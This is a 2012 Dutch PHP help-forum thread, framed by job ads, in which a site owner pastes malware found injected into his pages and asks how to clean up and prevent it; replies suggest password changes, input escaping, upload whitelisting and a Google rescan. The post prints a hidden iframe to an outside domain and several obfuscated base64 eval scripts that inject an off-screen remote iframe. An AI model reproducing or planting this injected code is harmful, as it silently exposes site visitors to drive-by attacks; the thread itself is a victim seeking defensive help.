Hackers?

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Full stack .NET developer Microsoft 365

Wat ga je doen als Full stack .NET developer Microsoft 365? Je stelt je op als sparringpartner voor het team en PO over toekomstige functionaliteiten, architectuur en mogelijke nieuwe producten. Je bent mede-verantwoordelijk voor het vertalen en omzetten van een user story in een passend technisch design. Je implementeert functionaliteiten op basis van een technisch design en user story. Je bent mede-verantwoordelijk voor het beheer van Azure DevOps, waaronder het beheer van GIT, Build Pipelines, Release Pipelines en geautomatiseerde testen. Hier herken jij jezelf in Hbo werk- en denkniveau of hoger aangevuld met relevante certificeringen en/of cursussen; Minimaal 3 jaar

Bekijk vacature »

Full stack Javascript ontwikkelaar

Functie Benieuwd hoe jouw dag eruit ziet? Je komt binnen rond een uur of 10 en dat start je met de morning call. Dit doen we vanaf het hoofdkantoor of op het lab, ligt eraan welk project je mee bezig bent. Na de call en het verdelen van de tickets ga je met je team aan de slag. Rond een uur of 12 is er een goede lunch en ga je smiddags weer lekker door met je werk. De ene keer maak jij een game voor een groot merk om de interactie tussen product en eindgebruiker te vergroten. De andere

Bekijk vacature »

C#.NET Developer

Functieomschrijving Voor een software ontwikkelaar in de omgeving van Vught zijn we op zoek naar een gemotiveerde C# ontwikkelaar. Deel jij hun passie voor development en dan vooral in C#.NET? Dan kan dit wel eens jouw droombaan zijn! Jouw werkzaamheden zullen er ongeveer als volgt uit gaan zien Door de wensen van de klant goed te begrijpen ga jij aan de slag dit om te zetten naar passende oplossingen en werk je deze uit tot een sterk eindproduct. Je gaat je bezighouden met de ontwikkeling van webapplicaties en websites, dit doe je door middel van ASP.NET, MVC Frameworks en C#.

Bekijk vacature »

Front end developer

Functie Jij als front end developer gaat werken binnen de teams van onze klant, uiteraard met alle moderne technieken. Opdrachten worden echt gericht op jouw leerdoelen en jouw behoeftes. Wij hebben een omgeving gecreëerd waarin je echt jezelf kan zijn en waar echt gekeken wordt naar jouw voorkeuren. Maak je een fout? Geen probleem, leer ervan en dan ga weer door. Door de variëteit aan werk kun je in verschillende omgevingen een kijkje nemen en dus jezelf snel ontwikkelen. Eisen Je bent communicatief vaardig en houdt van een dynamische omgeving Je hebt HBO werk- en denkniveau Je hebt gedegen kennis

Bekijk vacature »

C#.NET Developer

Functieomschrijving We are looking for a dutch native speaker In deze uitdagende functie ga je werken als onderdeel van het development team, in de functie van C#.NET Developer, Je gaat maatwerk software bouwen voor diverse klanten. Ook optimaliseer je bestaande software en bouw je API koppelingen. Je bent vooral met back-end development bezig. Je krijgt veel vrijheid in deze functie en je krijgt de kans om mee te denken in bedrijfsprocessen. Deels thuiswerken is geen enkel probleem! Bedrijfsprofiel Deze organisatie is gevestigd in de regio van Boxtel. Het is van oorsprong een familiebedrijf, die gestart zijn met het bouwen van

Bekijk vacature »

Medior PHP Developer

Bij Getnoticed doen wij wat we leuk vinden, websites bouwen en online marketing. Voor veel van onze klanten doen we dan ook allebei. Wel zo fijn om campagnes te draaien voor conversiegerichte website die in eigen beheer zijn. In onze vestiging in Nederweert zitten onze development afdelingen en worden de websites gebouwd. Op dit moment zijn we op zoek naar jou: dé PHP/Back-end developer die net als wij, het hoofd boven het maaiveld durft uit te steken! In het kort Even een paar punten die omschrijven wat deze toffe baan inhoudt: Het bedenken van nieuwe functionaliteiten Het verbeteren van het

Bekijk vacature »

Typescript Developer / Cloud platform

Dit ga je doen (Door)Ontwikkelen van het cloud platform; (Door)Ontwikkelen van microservices; Bouwen van nieuwe functionaliteiten; Verbeteringen aandragen voor het cloud platform; Sparren met de business. Hier ga je werken Onze opdrachtgever, gevestigd in regio Eindhoven, levert een compleet dienstenpakket op het gebied van IT. Zij pakken verschillende (complexe) vraagstukken van grote organisaties op. De sfeer intern is gezellig en informeel. Men houdt van hard werken maar gezelligheid door middel van een borrel of gezamenlijke lunch komt er veel voor. Als Typescript ontwikkelaar word je onderdeel van het team gericht op de (door)ontwikkeling van hun eigen cloud platform welke wordt

Bekijk vacature »

Lead C++ Developer

The role of Lead C++ Developer As Lead C++ Developer at KUBUS you will be responsible for the implementation design of requirements and the software architecture of the desktop applications of BIMcollab, our platform for 3D model validation and issue management aimed at improving the quality of 3D building design models. Better 3D models lead to better buildings, thus contributing to the sustainability of the built environment with smarter use of materials, less waste and energy-efficient buildings. A good user experience is of paramount importance to us; we go for innovation and quality in our development. In your role as

Bekijk vacature »

Traineeship IT regio Amsterdam/Utrecht

Wat ga je doen? Het traineeship begint met een fulltime maand cursussen en praktijkdagen, waarin je de basis van het IT-vak leert op de Shared Servicedesk (SSD). Daarnaast ga je meteen aan de slag voor je eerste certificering! (ITILv4). Je start in een groep met 4 tot 10 deelnemers, waarmee jij gedurende die maand optrekt en je kennis kunt delen. Na het voltooien van de eerste maand ga je direct voor een langere periode aan de slag bij één van onze klanten of blijf je intern bij ons op de Shared Servicedesk. Je bent het eerste aanspreekpunt van de eindgebruikers

Bekijk vacature »

Junior Front end developer Onderwijssoftware

Functie Als Junior front end developer kom jij terecht in een klein, maar hecht team bestaande uit 5 andere developers (waarvan 2 senioren, 2 medior en 1 junior). Met de gezamenlijke missie om “ieder kind te helpen met onze software” wordt er dagelijks gepassioneerd en hard gewerkt aan ons in-house ontwikkeld platform. Deze software is gebaseerd is op AI, machine Learning en wetenschappelijke inzichten. Dagelijks zul jij werken met onze high traffic webapplicatie. We hebben ruim 300.00 gebruikers en meer dan 2 miljard records waar je te maken mee krijgt! Verder zul jij je bezighouden met: – Het ontwikkelen van

Bekijk vacature »

C# Developer

Functie omschrijving Voor een softwarebedrijf in de omgeving van Veghel zijn we op zoek naar een C# developer. Word jij blij van ontwikkelen in C# en .NET? Lees dan snel verder! Jouw werkzaamheden zullen er als volgt uit gaan zien: Door middel van ASP.NET, MVC Framework en C# ga je webshops, websites en webapplicaties ontwikkelen. Je zorgt voor de optimalisatie van bestaande software en de automatisering van bedrijfsprocessen. Op basis van de wensen van de klant ga je samen met je collega's ga je op zoek naar de juiste oplossingen en je gaat dit uitwerken tot een mooi eindproduct. Bedrijfsprofiel

Bekijk vacature »

Medior Mobile Developer iOS Amsterdam

Functie What will you be doing as Mobile Developer? As an iOS app developer you will work in a multidisciplinary team of app developers, web developers and designers. You will work on world-class apps that will be used by thousands of people. There is a lot of room for self-development on a technical and personal level. Together with the rest of the team you develop in the newest techniques and you go for the best quality. We work with Kotlin Multiplatform Mobile to develop hybrid apps and we guarantee quality with peer reviews, unit testing and we use a CI/CD.

Bekijk vacature »

Full stack .NET developer Microsoft 365

Wat ga je doen als Full stack .NET developer Microsoft 365? Je stelt je op als sparringpartner voor het team en PO over toekomstige functionaliteiten, architectuur en mogelijke nieuwe producten. Je bent mede-verantwoordelijk voor het vertalen en omzetten van een user story in een passend technisch design. Je implementeert functionaliteiten op basis van een technisch design en user story. Je bent mede-verantwoordelijk voor het beheer van Azure DevOps, waaronder het beheer van GIT, Build Pipelines, Release Pipelines en geautomatiseerde testen. Hier herken jij jezelf in Hbo werk- en denkniveau of hoger aangevuld met relevante certificeringen en/of cursussen; Minimaal 3 jaar

Bekijk vacature »

Embedded Developer C++

Functie omschrijving Ben jij op zoek naar een leuke uitdaging als Embedded Developer, zoek dan niet verder! Voor een leuke opdrachtgever in omgeving Rotterdam zijn wij op zoek naar een Embedded Developer die graag met Embedded Devices werkt. Je zult verantwoordelijk worden voor het ontwikkelen en onderhouden van diverse producten. Jouw specialisatie ligt op het vlak van software, hardware en back-end. Dit bedrijf is gespecialiseerd in het ontwerpen van software voor een unieke industrie. Wil jij betrokken worden bij een proces dat loopt van ontwikkeling tot installatie? Waarbij je bezig zult zijn met perfecte systemen die geleverd worden aan binnen

Bekijk vacature »

PHP developer - Digital Agency

Functie Het team telt momenteel 20 collega’s, bestaande uit developers (front- en backend) en het operations team, waaronder ook het management en twee scrum masters vallen. Ze zijn op zoek naar een PHP developer die in staat is zelfstandig te werken. Je komt te werken in één van de drie scrumteams en gaat aan de slag met een project voor de klant. Het fijne hieraan is dat je wel afwisseling hebt qua werk, maar tegelijkertijd doorlopend werkt voor bestaande klanten. Hierdoor krijg je ook de kans om echt de diepte in te gaan en innovatieve technische oplossingen neer te zetten.

Bekijk vacature »
Olivier Peeters

Olivier Peeters

04/11/2012 13:43:11
Quote Anchor link
Hallo allen,

ik heb een probleem! Blijkbaar is er, op onverklaarbare wijze, op al mijn pagina's deze code toegevoegd =>
"<iframe style="visibility: hidden; display: none; display: none;" src="http://djerseen.com/referer.php?id={A8D99C2D-8615-4C21-AB70-EE2DF83F6905}"></iframe>"


"<script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}returnt;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyIHVybD0iaHR0cDovLyI7DQpmb3IgKGk9MDtpPGVuYy5sZW5ndGg7aSsrKSB1cmwrPWtleXNzLnN1YnN0cigoYWgqZW5jW2ldKSAlIDMxLDEpOw0KdXJsKz0iLm9yZy90cy9nby5waHAcT0xIjsNCmZmZj0iZnJhbSI7DQppZiAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2JvZHknKVswXSkgeyBpZnJhbWVyKCk7fSBlbHNlIHsNCmRvY3VtZW50LndyaXRlKCI8aSIrZmZmKyJlIHNyYz0nIit1cmwrIicgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZ
ik7DQp9')));</script><script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}
('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyIHVybD0iaHR0cDovLyI7DQpmb3IgKGk9MDtpPGVuYy5sZW5ndGg7aSsrKSB1cmwrPWtleXNzLnN1YnN0cigoYWgqZW5jW2ldKSAlIDMxLDEpOw0KdXJsKz0iLm9yZy90cy9nby5waHAcT0xIjsNCmZmZj0iZnJhbSI7DQppZiAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2JvZHknKVswXSkgeyBpZnJhbWVyKCk7fSBlbHNlIHsNCmRvY3VtZW50LndyaXRlKCI8aSIrZmZmKyJlIHNyYz0nIit1cmwrIicgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZ
ik7DQp9')));</script><script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|
(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}
('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDM
/* Ik heb hier een heel deel weggeknipt, want dit gaat nog paginalang door ;-) Tot de laatste regel */
</script>"

Deze code blijkt dus malware te zijn, welke op onverklaarbaze wijze op mijn website gepost is..

Belangrijk is dat ik dit heb op mijn eigen website (gehost op 3owl), en dat ik deze enkel gemaakt heb dmv PHP-pagina's (dus geen CMS) & Filezilla (overzetten op server). Verder zit er voor het gastenboek een 1 MySQL database op mijn pagina. Deze code is ingesloten in mijn pagina's die zichtbaar zijn in het scherm (dus ge-include pagina's hebben deze code niet)...

Door deze code is mijn site gelocaliseerd als aanvalssite, waardoor deze onbereikbaar is. Link van mijn website is -> http://oli4tje.3owl.com/

Hoe komt het dat ik een hacker heb, wat valt hieraan te doen & hoe in de toekomst vermijden?
Vooral, als alles opgelost is (heb nu wel al alle code verwijderd), hoe zorg ik ervoor dat de melding van aanvalsite terug verwijderd word (& dus terug op een normale manier bezocht kan worden?

Alvast bedankt voor jullie raad/hulp. Want ik snap niet hoe dit kan...

Vriendelijke groeten
 
PHP hulp

PHP hulp

20/05/2024 13:39:28
 
Frank Nietbelangrijk

Frank Nietbelangrijk

04/11/2012 14:11:35
Quote Anchor link
Om de site weer open te stellen lijkt het me handig dat je contact opneemt met je provider. Ik zie dat het een gratis host is? Dus ja daar kunnen we niet al te veel van verwachten. Wat bedoel je precies met ... aan mijn pagina's toegevoegd? Welke bestanden dat willen we weten: PHP HTML? of stond de code in je database?
In ieder geval geldt nu dat je al je wachtwoorden moet veranderen en dat je heel kritisch moet gaan kijken naar alle input van buiten af: dus alle <FORM>'s. de waarden worden - waarschijnlijk met PHP- uitgelezen. Die waarden moet je controleren op alles dat maar mogelijk is en escapen zie
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
<?php
$string
=  mysql_real_escape_string ($string); ?>


Heb je ook een file upload in één of meerdere formulieren? zorg dan dat er nooit geen extensies als PHP e.d. geupload kunnen worden. Je moet dit controleren niet aan de hand van een blacklist maar aan de hand van een whitelist, dus alleen extensies doorlaten die jij goedkeurt
 
Reshad F

Reshad F

04/11/2012 14:12:21
Quote Anchor link
ik denk een FTP lek, wachtwoorden veranderen en bij google developer tools een aanvraag doen voor een rescan of hoe het ook heet.. ( ben het ff kwijt ) maar het is niet te missen als je op de pagina bent. ( binnen ongeveer 2 uur meestal ) zou het probleem opgelost moeten zijn. en anders moet je wachten kan een paar uur duren of een week.. maar als google merkt dat het gevaar weg is dan wordt de melding weggehaald :)
 
Ceasar Feijen

Ceasar Feijen

04/11/2012 14:46:41
Quote Anchor link
Misschien ook je gastenboek even checken. Je kunt nu gewoon op submit drukken en voila
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.